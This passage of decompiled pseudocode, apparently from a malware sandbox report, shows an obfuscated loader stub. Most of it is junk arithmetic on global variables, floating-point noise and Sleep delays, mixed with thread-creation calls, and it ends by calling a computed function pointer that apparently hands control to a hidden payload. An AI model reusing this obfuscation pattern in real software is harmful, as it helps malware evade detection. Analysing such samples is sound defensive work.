						_t1053 = _t1324 * _v20;
						 *0xfae320 = E00F7CABC();
					}
					 *0xfae288 =  *0xfae288 + 1;
					_t663 =  *0xfae288; // 0xec5403bf
					_t794 =  *0xfb0448; // 0xfa3935
					 *0xfae46c = _t663 + ( *0xfae46c & 0x0000ffff);
					 *0xfae47c =  *0xfae47c + 0x14529278;
					_t479 =  *0xfae144; // 0xca10ec72
					_v8 = _t479 + 0x17ff0099;
					_v32 = _t794 + 0x4b4;
					asm("fild dword [ebp-0x4]");
					_t880 = 0;
					 *0xfae314 = _t1053;
					 *0xfae144 =  *0xfae144 + 1;
					_t1054 =  *0xfae3e0;
					_t665 =  *0xfae2b0; // 0xef43cada
					_v8 = _t665 + 0x3390a4a3;
					asm("fild dword [ebp-0x4]");
					asm("fsubp st1, st0");
					 *0xfae3e0 = _t1054;
					_v8 =  *0xfae020 & 0x0000ffff;
					asm("fild dword [ebp-0x4]");
					_v20 = _t1054;
					_t1056 =  *0xfae2b4 + _v20;
					 *0xfae2b4 = _t1056;
					_t667 =  *0xfae158; // 0x80000000
					_v8 = _t667;
					asm("fild dword [ebp-0x4]");
					_v20 = _t1056;
					asm("fsubr qword [ebp-0x10]");
					 *0xfae158 = E00F7CABC();
					_t797 =  *0xfae368; // 0x80000000
					_v8 = _t797;
					asm("fild dword [ebp-0x4]");
					_v8 =  *0xfae538 -  *0xfae2d0;
					 *0xfae368 = E00F7CABC();
					 *0xfae07c =  *0xfae07c - st1;
					_v20 =  *0xfa84d0 -  *0xfae054;
					 *0xfae250 =  *0xfae250 + _v20;
					 *0xfae054 =  *0xfae054 - st1;
					L50:
					 *0xfae1d0 =  *0xfae1d0 + 1;
					_t484 =  *0xfae1d0; // 0x2f751c98
					if(_t484 - 0x62eda4e == 0x656127d6) {
						_t1310 =  *0xfae468;
						_t724 =  *0xfae008; // 0x893a
						_v44 = _t1310;
						_v8 = _t724 + 0x455c79a5;
						asm("fild dword [ebp-0x4]");
						_v12 = _t1310;
						asm("fsubr qword [ebp-0x28]");
						 *0xfae468 =  *0xfae050 + _v12;
					}
					_t1069 =  *0xfae358;
					_t798 =  *0xfae4bc; // 0x45d8d594
					_t487 =  *0xfae5dc & 0x0000ffff;
					_v8 =  *0xfae128 & 0x0000ffff;
					 *0xfae5dc =  *0xfae5dc + _t623;
					 *0xfae4bc =  *0xfae4bc + 1;
					asm("fild dword [ebp-0x4]");
					_v8 = _t798;
					asm("fsubp st1, st0");
					_v44 = _t1069;
					asm("fild dword [ebp-0x4]");
					_v8 = _t487 + 0x5ff558b3;
					asm("fsubr qword [ebp-0x28]");
					_v44 = _t1069;
					asm("fild dword [ebp-0x4]");
					asm("fcomp qword [ebp-0x28]");
					asm("fnstsw ax");
					if((_t487 & 0x00000005) != 0) {
						_t488 =  *0xfae268; // 0xd18b
						_t671 =  *0xfae608; // 0x6261
						_t672 =  *0xfae0ec; // 0x2a1f8050
						_t229 = _t488 - 0x6e439af7; // -678085987
						 *0xfae0ec = _t672 * (_t671 + _t229);
						 *0xfae608 =  *0xfae608 + _t623;
					} else {
						 *0xfae48c = ( *0xfae48c & 0x0000ffff) * 0x2ad26d76;
					}
					 *0xfae4f0 =  *0xfae4f0 + _t623;
					_t800 =  *0xfae0bc; // 0xdec
					_t674 =  *0xfae0c4; // 0xdf1431b
					_t801 =  *0xfae4f0; // 0xcfdf72e0
					 *0xfae0bc = _t801 + _t800 - _t674 + 0x9e32f02e;
					 *0xfae0c4 =  *0xfae0c4 + _t623;
					if(_t880 != 1) {
						 *0xfae55c = ( *0xfae55c & 0x0000ffff) * 0x473bd0fc;
						 *0xfae594 = E00F7CABC();
						_t880 = 1;
						 *0xfae520 =  *0xfae520 +  *0xfa84b8;
						 *0xfae154 = ( *0xfae154 & 0x0000ffff) * ( *0xfae26c & 0x0000ffff);
						_t714 =  *0xfae368; // 0x80000000
						 *0xfae5d0 = ( *0xfae5d0 & 0x0000ffff) - _t714;
						 *0xfae560 =  *0xfae560 *  *0xfa84b0;
						 *0xfae30c =  *0xfae30c + ( *0xfae230 & 0x0000ffff) + 0xa485660f;
						 *0xfae268 = ( *0xfae268 & 0x0000ffff) + 0x185043c9;
						_t1268 =  *0xfae070 -  *0xfa84a8;
						 *0xfae070 = _t1268;
						_t568 = 0xc9858f7e - ( *0xfae5a8 & 0x0000ffff);
						_v8 = _t568;
						asm("fild dword [ebp-0x4]");
						_v44 = _t1268;
						 *0xfae3a0 =  *0xfae3a0 + _v44;
						 *0xfae5a8 =  *0xfae5a8 + 1;
						_t1271 =  *0xfae110;
						asm("fcomp qword [0xfa84a0]");
						asm("fnstsw ax");
						if((_t568 & 0x00000041) != 0) {
							_t716 =  *0xfae17c; // 0xb2a9
							_v8 = _t716;
							asm("fild dword [ebp-0x4]");
							_v44 = _t1271;
							asm("fsubp st1, st0");
							 *0xfae380 =  *0xfae4c8 + _v44;
						} else {
							_t727 =  *0xfae174; // 0x7ed8a3c5
							_v8 = _t727;
							asm("fild dword [ebp-0x4]");
							_v44 = _t1271;
							 *0xfae174 =  *0xfae174 + 1;
							_t1318 =  *0xfae240 -  *0xfa8498;
							asm("fcomp qword [ebp-0x28]");
							asm("fnstsw ax");
							if((_t568 & 0x00000005) != 0) {
								_t1320 =  *0xfae248 + st1;
								 *0xfae248 = _t1320;
								_t580 =  *0xfae280; // 0xf447b558
								_v8 = _t580;
								asm("fild dword [ebp-0x4]");
								_v44 = _t1320;
								asm("fsubr qword [ebp-0x28]");
								 *0xfae280 = E00F7CABC();
							} else {
								_t849 =  *0xfae080; // 0xf362bf6c
								_v8 = _t849 - 0x6c7cc448;
								asm("fild dword [ebp-0x4]");
								 *0xfae170 = _t1318;
								 *0xfae080 =  *0xfae080 + _t623;
							}
						}
						 *0xfae148 =  *0xfae148 + st2;
						 *0xfae074 =  *0xfae148 +  *0xfa8488 +  *0xfa8480;
						 *0xfae2d0 =  *0xfae2d0 *  *0xfa8478;
						 *0xfae5c4 = E00F7CABC();
						_t1285 =  *0xfae438 + st1;
						 *0xfae438 = _t1285;
						 *0xfae300 = 0xd400000;
						 *0xfae304 = 0x41d241c6;
						_t570 =  *0xfae5b4; // 0x1cd4719a
						_t717 =  *0xfae594; // 0x80000001
						 *0xfae4d0 = _t717 + _t570 + 0xcfa02057;
						 *0xfae594 =  *0xfae594 + 1;
						 *0xfae5b4 =  *0xfae5b4 + 1;
						 *0xfae2c4 =  *0xfae2c4 + _t623;
						_t841 =  *0xfae2c4; // 0x331a
						_t719 =  *0xfae040; // 0xe6acfb4
						_t572 = _t841;
						_t842 =  *0xfae24c; // 0x97715537
						_v8 = _t719 - _t572;
						asm("fild dword [ebp-0x4]");
						_v8 = _t842;
						_v28 = _t1285;
						asm("fild dword [ebp-0x4]");
						_v44 = _t1285;
						 *0xfae24c =  *0xfae24c + 1;
						asm("fcomp qword [ebp-0x18]");
						asm("fnstsw ax");
						if((_t572 & 0x00000041) != 0) {
							 *0xfae088 =  *0xfae088 + st2;
							_t573 =  *0xfae390; // 0xcd6d4fe9
							_t1291 =  *0xfae088 +  *0xfa8468;
							_v8 = _t573;
							_v28 = _t1291;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1291 + _v28;
							 *0xfae07c =  *0xfae07c + _v28;
						} else {
							 *0xfae1e0 =  *0xfae1e0 -  *0xfa8470;
						}
						_t1295 =  *0xfae2f0;
						asm("fsubrp st2, st0");
						asm("fxch st0, st1");
						 *0xfae2f0 = _t1295;
						_t721 =  *0xfae2f0; // 0x22c00000
						_t843 =  *0xfae2f4; // 0xc1d4f706
						_v20 = _t721;
						_v8 =  *0xfae108 & 0x0000ffff;
						_v16 = _t843;
						asm("fild dword [ebp-0x4]");
						_v28 = _t1295 + _v20;
						_t1298 =  *0xfae388 + _v28;
						 *0xfae388 = _t1298;
						_t844 =  *0xfae58c; // 0x81dce92e
						_v8 = _t844;
						asm("fild dword [ebp-0x4]");
						_v28 = _t1298;
						asm("fsubr qword [ebp-0x18]");
						 *0xfae58c = E00F7CABC();
						_t1302 =  *0xfae370 *  *0xfa8458;
						 *0xfae370 = _t1302;
						_t576 =  *0xfae320 & 0x0000ffff;
						_v8 = _t576;
						asm("fild dword [ebp-0x4]");
						_v28 = _t1302;
						asm("fsubr qword [ebp-0x18]");
						asm("fcompp");
						asm("fnstsw ax");
						_t1305 =  *0xfa8454 +  *0xfae468;
						 *0xfae468 = _t1305;
						if((_t576 & 0x00000005) != 0) {
							_t845 =  *0xfae334; // 0xc334
							 *0xfae4d0 =  *0xfae4d0 + _t845;
							 *0xfae334 =  *0xfae334 + _t623;
						} else {
							_t848 =  *0xfae4a8; // 0x0
							_t725 =  *0xfae0ec; // 0x2a1f8050
							_v8 = _t725 + _t848 + 0x9a842597;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1305;
							 *0xfae240 =  *0xfae240 * _v28;
							 *0xfae4a8 =  *0xfae4a8 + _t623;
							 *0xfae0ec =  *0xfae0ec + 1;
						}
						Sleep(0xa); // executed
						_v28 =  *0xfae248 +  *0xfa8450;
						 *0xfae468 =  *0xfae468 + _v28;
						asm("fld1");
						asm("fld1");
						asm("fxch st0, st1");
						goto L50;
					}
					 *0xfae2e0 =  *0xfae2e0 *  *0xfa8448;
					 *0xfae198 =  *0xfae198 -  *0xfa8440;
					 *0xfae5e8 =  *0xfae5e8 -  *0xfa8438;
					_v28 =  *0xfae090 -  *0xfae130 +  *0xfa8430;
					 *0xfae130 =  *0xfae130 + _v28;
					 *0xfae130 =  *0xfae130 + st1;
					 *0xfae070 =  *0xfae070 -  *0xfa8428;
					_t494 =  *0xfae4d0; // 0x6c745516
					_t675 =  *0xfae0f0; // 0xfafdf6a6
					 *0xfae4d0 =  *0xfae4d0 + 1;
					 *0xfae0f0 =  *0xfae0f0 + 1;
					if(_t675 + 0x62c0feec >= _t494 + 0xa8ea3d26) {
						_t835 =  *0xfae0bc; // 0xdec
						_t712 =  *0xfae350; // 0xdea3a412
						 *0xfae3d4 = _t835 - _t712 + 0x64a54235;
					}
					 *0xfae16c = 0xffff93ae;
					_t1086 =  *0xfae3f0 -  *0xfa8420;
					 *0xfae3f0 = _t1086;
					_t496 =  *0xfae330; // 0xb179bfc0
					_t677 =  *0xfae11c; // 0xe8ccf6b5
					_t277 = _t496 + 0x980c45a; // 0xf24dbb0f
					_v8 = _t677 + _t277;
					asm("fild dword [ebp-0x4]");
					_v28 = _t1086;
					_t1088 =  *0xfae0d0 +  *0xfa8418;
					asm("fsubr qword [0xfa8410]");
					asm("fcomp qword [ebp-0x18]");
					asm("fnstsw ax");
					if((_t496 & 0x00000005) == 0) {
						_t551 =  *0xfae288; // 0xec5403bf
						_v8 = _t551 + 0x22ae97cf;
						asm("fild dword [ebp-0x4]");
						_v28 = _t1088;
						 *0xfae110 =  *0xfae470 + _v28;
						_t1088 =  *0xfae470 - st2;
						 *0xfae470 = _t1088;
						 *0xfae288 =  *0xfae288 + 1;
					}
					 *0xfae04c = ( *0xfae04c & 0x0000ffff) - 0x782aaca0;
					_t497 =  *0xfae11c; // 0xe8ccf6b5
					_t805 =  *0xfae610; // 0x80000000
					_t498 = _t497 + 0x872523e6;
					 *0xfae11c = _t805 + _t498;
					 *0xfae610 =  *0xfae610 + 1;
					asm("fsubr dword [0xfae43c]");
					 *0xfae43c = _t1088;
					_v44 =  *0xfae338;
					_v28 =  *0xfae568 +  *0xfa8408;
					asm("fsubr qword [ebp-0x18]");
					asm("fcomp qword [ebp-0x28]");
					asm("fnstsw ax");
					 *0xfae568 =  *0xfae568 + st1;
					if((_t498 & 0x00000041) != 0) {
						 *0xfae1b8 =  *0xfa8404 -  *0xfae1e4 -  *0xfa8400;
					} else {
						 *0xfae0cc = E00F7CABC();
					}
					_t680 =  *0xfae5b4; // 0x1cd4719a
					 *0xfae398 = ( *0xfae398 & 0x0000ffff) - _t680 + 0x4d8d5763;
					 *0xfae5b4 =  *0xfae5b4 + 1;
					_t807 =  *0xfae410; // 0x94ea
					_t290 = ( *0xfae5d4 & 0x0000ffff) - _t807 - 0x5c6469d7; // -1066399805
					 *0xfae5d4 = ( *0xfae2f8 & 0x0000ffff) + _t290;
					 *0xfae470 =  *0xfae470 *  *0xfa83f8;
					asm("fsubr qword [0xfa83f0]");
					_t1101 =  *0xfae240 -  *0xfa83e8;
					_v8 =  *0xfae4fc & 0x0000ffff;
					_v28 = _t1101;
					asm("fild dword [ebp-0x4]");
					_t507 = E00F7CABC();
					_t881 = _v32;
					 *0xfae4fc = _t507;
					_v32 = 4;
					 *0xfae240 = _t1101 + _v28 +  *0xfae240;
					while(1) {
						_t809 =  *0xfae59c; // 0x3ef2
						_t684 =  *0xfae5c4; // 0x80000000
						 *0xfae5c4 = _t684 * (_t809 + 0x36cd7c41);
						_t511 = SetEvent( *(0xfafdb8 + ( *_t881 & 0x0000ffff) * 4));
						 *0xfae5fc =  *0xfae5fc -  *0xfa83e4;
						_v28 =  *0xfae338 -  *0xfa83e0 +  *0xfa83dc;
						asm("fucompp");
						asm("fnstsw ax");
						asm("fld1");
						asm("faddp st2, st0");
						asm("fxch st0, st1");
						 *0xfae338 = st0;
						if((_t511 & 0x00000044) == 0) {
							_t710 =  *0xfae390; // 0xcd6d4fe9
							 *0xfae390 = _t710 * 0xdbfe4457;
						}
						asm("fsubp st1, st0");
						 *0xfae188 =  *0xfae0b0 -  *0xfa83d8;
						_v28 =  *0xfae344;
						 *0xfae344 =  *0xfae2b8 + _v28;
						 *0xfae588 =  *0xfae588 + _t623;
						asm("fld1");
						asm("fxch st0, st1");
						 *0xfae5f0 =  *0xfae5f0 + st0;
						_v28 =  *0xfae248;
						_t811 =  *0xfae588; // 0xb5d5
						_t1123 =  *0xfae548 + _v28;
						_t686 =  *0xfae5f0; // 0x6ad7a501
						_t812 =  *0xfae5f4; // 0xc6fee42d
						_v28 = _t1123;
						_v8 = _t811;
						_t513 =  *0xfae458; // 0x5bdf
						_v20 = _t686;
						asm("fild dword [ebp-0x4]");
						asm("fsubr qword [ebp-0x18]");
						_v8 = _t513;
						_v16 = _t812;
						_t813 =  *0xfae0dc; // 0x5ed85cd6
						 *0xfae0dc =  *0xfae0dc + _t623;
						_v44 = _t1123;
						asm("fild dword [ebp-0x4]");
						_v8 = _t813;
						asm("fsubr qword [ebp-0x10]");
						_v28 = _t1123;
						asm("fild dword [ebp-0x4]");
						asm("fsubr qword [ebp-0x18]");
						_t1124 = _v44;
						asm("fucompp");
						asm("fnstsw ax");
						if((_t513 & 0x00000044) == 0) {
							_v28 =  *0xfae050;
							_t549 =  *0xfae080; // 0xf362bf6c
							_t1255 =  *0xfae344 + _v28;
							_v8 = _t549;
							_v28 = _t1255;
							asm("fild dword [ebp-0x4]");
							_t1124 = _t1255 + _v28;
							_t513 = E00F7CABC();
							 *0xfae080 = _t513;
						}
						while(1) {
							_t688 =  *0xfae1d0; // 0x2f751c98
							_v8 = _t688;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1124;
							asm("fucompp");
							asm("fnstsw ax");
							 *0xfae2f0 =  *0xfae2f0 - st1;
							_t1132 =  *0xfae4a0 + st1;
							 *0xfae4a0 = _t1132;
							 *0xfae1d0 =  *0xfae1d0 + _t623;
							if((_t513 & 0x00000044) == 0) {
								_t1132 =  *0xfa83c0;
								asm("fucompp");
								asm("fnstsw ax");
								if((_t513 & 0x00000044) == 0) {
									_t1132 =  *0xfae438;
									_t834 =  *0xfae2c4; // 0x331a
									_v28 = _t1132;
									_v8 = _t834 - 0x69e407d5;
									asm("fild dword [ebp-0x4]");
									asm("fsubr qword [ebp-0x18]");
									 *0xfae438 = _t1132;
									 *0xfae2c4 =  *0xfae2c4 + 1;
								}
							}
							 *0xfae5dc = ( *0xfae5dc & 0x0000ffff) - ( *0xfae284 & 0x0000ffff);
							 *0xfae284 =  *0xfae284 + _t623;
							 *0xfae598 =  *0xfae598 + _t623;
							_t515 =  *0xfae508; // 0x0
							_t332 = _t515 + 0x4c99e23a; // 0xab723f10
							_t517 = ( *0xfae598 & 0x0000ffff) + _t332;
							_v8 = _t517;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1132;
							 *0xfae508 =  *0xfae508 + 1;
							_t1134 = _v28;
							asm("fucompp");
							asm("fnstsw ax");
							if((_t517 & 0x00000044) != 0) {
								 *0xfae0dc =  *0xfae0dc + _t623;
								_v28 =  *0xfae2e8;
								_v28 =  *0xfae0b4 + _v28;
								_t518 =  *0xfae2fc; // 0x87a9e522
								_t817 =  *0xfae0dc; // 0x5ed85cd6
								 *0xfae2fc =  *0xfae2fc + _t623;
								_t519 = _t518 + 0xc0df8e24;
								_v28 =  *0xfae058 + _v28;
								_v8 = _t817 + _t519;
								asm("fild dword [ebp-0x4]");
								asm("fcomp qword [ebp-0x18]");
								asm("fnstsw ax");
								 *0xfae058 =  *0xfae058 + st1;
								_t1134 =  *0xfae2e8 - st2;
								 *0xfae2e8 = _t1134;
								if((_t519 & 0x00000041) == 0) {
									_t1134 =  *0xfae380 +  *0xfa83b8;
									 *0xfae380 = _t1134;
								}
							} else {
								_t709 =  *0xfae178; // 0x4cf1
								 *0xfae530 =  *0xfae530 - _t709;
							}
							if( *(0xfafdb8 + ( *_t881 & 0x0000ffff) * 4) == 0) {
								break;
							}
							 *0xfae530 = 0xe1ab33d9;
							_t706 =  *0xfae230; // 0xeabf
							_t830 =  *0xfae080; // 0xf362bf6c
							_t542 = _t706 + 0xdd827551;
							_v8 = _t830 + _t542;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1134;
							asm("fcomp qword [ebp-0x18]");
							asm("fnstsw ax");
							 *0xfae260 =  *0xfae260 + st2;
							if((_t542 & 0x00000005) != 0) {
								 *0xfae3c0 =  *0xfae3c0 - st1;
								 *0xfae4b0 =  *0xfae3c0 -  *0xfa83a8 -  *0xfa83a0;
							} else {
								_v28 =  *0xfae2a8;
								asm("fsubr qword [ebp-0x18]");
								 *0xfae2a8 =  *0xfae084 +  *0xfa83b0;
								 *0xfae084 =  *0xfae084 - st2;
							}
							_t543 =  *0xfae28c; // 0x0
							_v8 = _t543;
							_v28 =  *0xfae428 -  *0xfa8398;
							asm("fild dword [ebp-0x4]");
							asm("fcomp qword [ebp-0x18]");
							asm("fnstsw ax");
							_t1225 =  *0xfae428 + st1;
							 *0xfae428 = _t1225;
							if((_t543 & 0x00000041) != 0) {
								st0 = _t1225;
								st0 = _t1225;
							} else {
								_v28 =  *0xfae100 +  *0xfae088;
								_v28 =  *0xfae07c + _v28;
								 *0xfae5fc =  *0xfae5fc * _v28;
								asm("faddp st2, st0");
								asm("fxch st0, st1");
								_t1225 =  *0xfae100 + st1;
								 *0xfae100 = _t1225;
								asm("fsubr qword [0xfae088]");
								 *0xfae088 = _t1225;
							}
							_t832 =  *0xfae12c; // 0xd1b0ed04
							_v8 = _t832;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1225;
							_t1227 =  *0xfae184 + _v28;
							 *0xfae184 = _t1227; // executed
							Sleep(0xa); // executed
							 *0xfae1fc =  *0xfae1fc + 1;
							_t544 =  *0xfae048; // 0xcf94
							_t708 =  *0xfae1fc; // 0x80000000
							_t365 = _t544 + 0x30ecaba4; // 0xb0ecaba4
							 *0xfae048 = _t708 + _t365;
							 *0xfae0fc =  *0xfae0fc + _t623;
							_t513 =  *0xfae0fc; // 0x76e9210e
							_v8 = _t513;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1227;
							asm("fsubr qword [ebp-0x18]");
							_v28 =  *0xfae134 +  *0xfa8390;
							asm("fcomp qword [ebp-0x18]");
							asm("fnstsw ax");
							asm("fld1");
							asm("fxch st0, st1");
							 *0xfae1d8 =  *0xfae1d8 + st0;
							if((_t513 & 0x00000041) == 0) {
								_t513 = E00F7CABC();
								 *0xfae570 = _t513;
							}
							_t1124 =  *0xfae518 *  *0xfa8384;
							 *0xfae518 = _t1124;
							asm("fld1");
							asm("fxch st0, st1");
						}
						_t691 =  *0xfae390; // 0xcd6d4fe9
						_v8 = _t691;
						asm("fild dword [ebp-0x4]");
						_v28 = _t1134;
						 *0xfae470 =  *0xfae470 + _v28;
						_t819 =  *0xfae294; // 0x3b89
						_v8 = _t819;
						asm("fild dword [ebp-0x4]");
						asm("fsubp st1, st0");
						_t522 = E00F7CABC();
						 *0xfae3d4 = _t522;
						 *0xfae294 =  *0xfae294 + _t623;
						_t1147 =  *0xfae360 - st1;
						 *0xfae360 = _t1147;
						_t692 =  *0xfae128; // 0x2069
						_v8 = _t692;
						asm("fild dword [ebp-0x4]");
						_v28 = _t1147;
						 *0xfae0a4 =  *0xfae0a4 * _v28;
						 *0xfae058 =  *0xfae058 - st1;
						_v28 =  *0xfae60c;
						asm("fsubr qword [ebp-0x18]");
						asm("fcompp");
						asm("fnstsw ax");
						_t1156 =  *0xfae3c0 - st1;
						 *0xfae3c0 = _t1156;
						if((_t522 & 0x00000005) == 0) {
							_t539 =  *0xfae0fc; // 0x76e9210e
							_v8 = _t539 + 0x595f4a6e;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1156;
							 *0xfae1a8 =  *0xfae1a8 + _v28;
							 *0xfae0fc =  *0xfae0fc + _t623;
						}
						_t881 =  &(_t881[1]);
						_v28 =  *0xfae5b0 +  *0xfa8380 -  *0xfa837c;
						 *0xfae450 =  *0xfae450 * _v28;
						asm("fsubrp st2, st0");
						asm("fxch st0, st1");
						 *0xfae510 =  *0xfae510 -  *0xfae0d0;
						 *0xfae10c = ( *0xfae10c & 0x0000ffff) - 0x5bbc02a0;
						 *0xfae04c = E00F7CABC();
						 *0xfae3e8 =  *0xfae3e8 + _t623;
						_t821 =  *0xfae3e8; // 0xa0a95d4a
						 *0xfae108 =  *0xfae108 + 1;
						_t525 = 0xde220361 - _t821;
						if(_t525 == ( *0xfae108 & 0x0000ffff)) {
							 *0xfae438 =  *0xfae438 *  *0xfa8378;
						}
						_v28 =  *0xfae210 +  *0xfa8370;
						_v28 =  *0xfae450 + _v28;
						asm("fcomp qword [ebp-0x18]");
						asm("fnstsw ax");
						 *0xfae450 =  *0xfae450 - st1;
						_t1176 =  *0xfae210 - st1;
						 *0xfae210 = _t1176;
						if((_t525 & 0x00000005) == 0) {
							_t537 =  *0xfae5c4; // 0x80000000
							_v8 = _t537;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1176;
							 *0xfae5c4 = E00F7CABC();
							 *0xfae490 =  *0xfae490 - st1;
						}
						 *0xfae470 =  *0xfae470 *  *0xfa83f8;
						_t696 =  *0xfae4fc; // 0xc1ce
						asm("fsubr qword [0xfa83f0]");
						_v8 = _t696;
						_v28 =  *0xfae240 -  *0xfa83e8;
						asm("fild dword [ebp-0x4]");
						_t526 = E00F7CABC();
						_t397 =  &_v32;
						 *_t397 = _v32 - 1;
						 *0xfae4fc = _t526;
						_t1183 =  *0xfae240 + st1;
						 *0xfae240 = _t1183;
						if( *_t397 != 0) {
							st0 = _t1183;
							continue;
						} else {
							 *0xfae1b0 =  *0xfae1b0 - st1;
							_t527 =  *0xfae478; // 0x8f288571
							_v8 = _t527;
							_v28 =  *0xfae1b0 -  *0xfa8360;
							asm("fild dword [ebp-0x4]");
							asm("fcomp qword [ebp-0x18]");
							asm("fnstsw ax");
							if((_t527 & 0x00000041) == 0) {
								_t704 =  *0xfae460; // 0x6c98b0f2
								_t829 =  *0xfae2ec; // 0x76d570f4
								 *0xfae460 = _t704 - _t829;
							}
							 *0xfae3c0 =  *0xfae3c0 *  *0xfa8358;
							 *0xfae5e8 =  *0xfae5e8 + st1;
							asm("fsubr qword [0xfa8350]");
							asm("fsubp st1, st0");
							 *0xfae528 =  *0xfae5e8;
							 *0xfae2f8 = ( *0xfae2f8 & 0x0000ffff) + 0x3c7c9748;
							_t697 =  *0xfae37c; // 0x277c3927
							 *0xfae37c = _t697 * 0x818d98ac;
							 *0xfae3e8 =  *0xfae3e8 + 0x3efa7e4f;
							_t1195 =  *0xfae4a0 -  *0xfa8348;
							 *0xfae4a0 = _t1195;
							 *0xfae1b8 = _t1195 +  *0xfae1b8;
							_t1198 =  *0xfae1b8 -  *0xfa8340;
							 *0xfae074 = _t1198;
							_t824 =  *0xfae4bc; // 0x45d8d594
							_t699 =  *0xfae024; // 0x80000001
							 *0xfae4bc = _t824 - _t699;
							_t700 =  *0xfae0e8; // 0x80000000
							 *0xfb073c = 0xfa3560 -  *0xfb073c;
							 *0xfae0b8 = _t700 + ( *0xfae0b8 & 0x0000ffff);
							 *0xfae508 =  *0xfae508 + _t623;
							_v8 =  *0xfae508 & 0x0000ffff;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1198;
							asm("fsubr qword [ebp-0x18]");
							_v28 =  *0xfae0a0;
							 *0xfae3f8 =  *0xfae3f8 + _v28;
							_t1202 =  *0xfae4a0;
							_t702 =  *0xfae3d4; // 0x977dff82
							_v8 = _t702 - 0x589e9e86;
							asm("fild dword [ebp-0x4]");
							asm("fsubp st1, st0");
							 *0xfae4a0 = _t1202;
							_v8 =  *0xfae4c4 & 0x0000ffff;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1202;
							asm("fsubr qword [ebp-0x18]");
							 *0xfae4c4 = E00F7CABC(); // executed
							_t536 =  *0xfb073c(); // executed
							asm("aaa");
							return _t536;
						}
					}
				} else {
					do {
						_t1325 =  *0xfae578;
						asm("faddp st2, st0");
						asm("fxch st0, st1");
						 *0xfae578 = _t1325;
						_t854 =  *0xfae140; // 0x9d1c
						_v8 = _t854;
						asm("fild dword [ebp-0x4]");
						_v20 = _t1325;
						asm("fsubp st1, st0");
						 *0xfae2b8 =  *0xfae578 + _v20;
						_t1329 =  *0xfae260;
						_t730 =  *0xfae390; // 0xcd6d4fe9
						_v20 = _t1329;
						_v8 = _t730 - 0x550e0539;
						asm("fild dword [ebp-0x4]");
						asm("fsubr qword [ebp-0x10]");
						 *0xfae260 = _t1329;
						 *0xfae460 =  *0xfae460 + 1;
						_t855 =  *0xfae460; // 0x6c98b0f2
						_v8 = _t855 - 0x410225f0;
						asm("fild dword [ebp-0x4]");
						_v36 = _t1329;
						_t587 =  *0xfae17c; // 0xb2a9
						_t1331 =  *0xfae394 -  *0xfa8518;
						 *0xfae17c =  *0xfae17c + 1;
						_v8 = _t587;
						_v20 = _t1331;
						asm("fild dword [ebp-0x4]");
						asm("fcomp qword [ebp-0x20]");
						asm("fnstsw ax");
						_t1333 = _t1331 + _v20 +  *0xfae394;
						 *0xfae394 = _t1333;
						if((_t587 & 0x00000041) == 0) {
							_t871 =  *0xfae55c; // 0x4f0f
							 *0xfae55c =  *0xfae55c + 1;
							if(_t871 + 0x53cf90f <= 0xec7c2f59) {
								_t751 =  *0xfae390; // 0xcd6d4fe9
								 *0xfae390 = _t751 * 0x4d8c5e0c;
							}
						}
						 *0xfae0e0 =  *0xfae0e0 + 0x3c636d6d;
						 *(0xfafdb8 + _t879 * 4) = 0;
						 *0xfae0c8 = ( *0xfae0c8 & 0x0000ffff) + 0x439cd323;
						_t588 =  *0xfae49c; // 0x3b0d
						_v8 = _t588 - 0x1d8f1928;
						asm("fild dword [ebp-0x4]");
						_v20 = _t1333;
						_t1334 =  *0xfae5b8;
						asm("fsubr qword [ebp-0x10]");
						_v20 = _t1334;
						_v8 =  *0xfae014 & 0x0000ffff;
						asm("fild dword [ebp-0x4]");
						_t590 = E00F7CABC();
						 *0xfae014 = _t590;
						_t735 =  *0xfae580; // 0x0
						_v8 = _t735;
						asm("fild dword [ebp-0x4]");
						_v20 = _t1334 * _v20;
						_t1337 = _v20;
						asm("fucompp");
						asm("fnstsw ax");
						if((_t590 & 0x00000044) == 0) {
							_t1337 =  *0xfae348 *  *0xfa8514;
							 *0xfae348 = _t1337;
						}
						_t591 = CreateThread(0, 0, E00F69C80, _t879, 0, 0); // executed
						 *0xfae608 = ( *0xfae608 & 0x0000ffff) + 0x37762b4f;
						_t861 =  *0xfae350; // 0xdea3a412
						_v8 = _t861 + 0x7ed3179e;
						asm("fild dword [ebp-0x4]");
						_v20 = _t1337;
						 *0xfae468 =  *0xfae468 + _v20;
						 *0xfae10c =  *0xfae10c + 1;
						 *0xfae5d0 = ( *0xfae10c & 0x0000ffff) - 0x49a51d2d; // executed
						FindCloseChangeNotification(_t591);
						_t863 =  *0xfae0dc; // 0x5ed85cd6
						_t593 =  *0xfae2b0; // 0xef43cada
						_t166 = _t863 + 0x26bfca76; // 0x116039550
						 *0xfae0dc = _t593 + _t166;
						_v20 =  *0xfa8510 -  *0xfae130;
						asm("fcomp qword [ebp-0x10]");
						asm("fnstsw ax");
						asm("fld1");
						asm("faddp st2, st0");
						asm("fxch st0, st1");
						 *0xfae20c = st0;
						if((_t593 & 0x00000001) != 0) {
							asm("fld1");
						} else {
							asm("fld1");
							asm("fxch st0, st1");
							 *0xfae5e8 =  *0xfae5e8 + st0;
							_t1365 =  *0xfae5e8;
							_t869 =  *0xfae10c; // 0x3ef9
							_t604 = _t869;
							_v36 = _t1365;
							_v8 = _t604;
							asm("fild dword [ebp-0x4]");
							_v20 = _t1365;
							asm("fsubr qword [ebp-0x10]");
							asm("fcomp qword [ebp-0x20]");
							asm("fnstsw ax");
							if((_t604 & 0x00000001) == 0) {
								 *0xfae0c8 =  *0xfae0c8 + 1;
								 *0xfae17c =  *0xfae17c + _t623;
							}
						}
						_t594 =  *0xfae330; // 0xb179bfc0
						 *0xfae48c = ( *0xfae48c & 0x0000ffff) * (_t594 + 0x597467c1);
						 *0xfae330 =  *0xfae330 + 1;
						 *0xfae594 = ( *0xfae4f4 & 0x0000ffff) - 0xece9b45;
						_t743 =  *0xfae430; // 0x7fffffff
						 *0xfae45c =  *0xfae45c - _t743;
						 *0xfae430 =  *0xfae430 + 1;
						_t744 =  *0xfae1d0; // 0x2f751c98
